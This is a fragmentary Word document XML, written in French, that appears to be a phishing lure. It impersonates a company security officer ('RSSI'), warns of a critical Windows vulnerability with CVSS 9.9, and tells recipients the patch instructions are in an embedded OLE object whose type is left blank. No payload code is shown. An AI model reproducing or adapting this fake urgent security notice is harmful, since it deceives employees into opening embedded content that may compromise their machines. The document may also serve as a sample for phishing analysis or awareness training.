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Vulnérabilité Microsoft Windows critique, CVSS score 9.9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La mis en place du correctif est expliquée dans le fichier Word ci-dessous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object w:dxaOrig="1387" w:dyaOrig="758">
          <v:shape id="ole_rId2" style="width:72.05pt;height:63.5pt" o:ole="">
            <v:imagedata r:id="rId3" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="" ShapeID="ole_rId2" DrawAspect="Content" ObjectID="_889043925" r:id="rId2"/>
        </w:objec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Par avance merci vos actions.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RSSI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gure">
    <w:name w:val="Figure"/>
    <w:basedOn w:val="Lgende"/>
    <w:qFormat/>
    <w:pPr/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LibreOffice/6.2.4.2$Windows_X86_64 LibreOffice_project/2412653d852ce75f65fbfa83fb7e7b669a126d64</Application>
  <Pages>1</Pages>
  <Words>27</Words>
  <Characters>142</Characters>
  <CharactersWithSpaces>165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2019-06-20T18:17:57Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <dc:language>fr-FR</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-06-22T22:50:40Z</dcterms:modified>
  <cp:revision>39</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>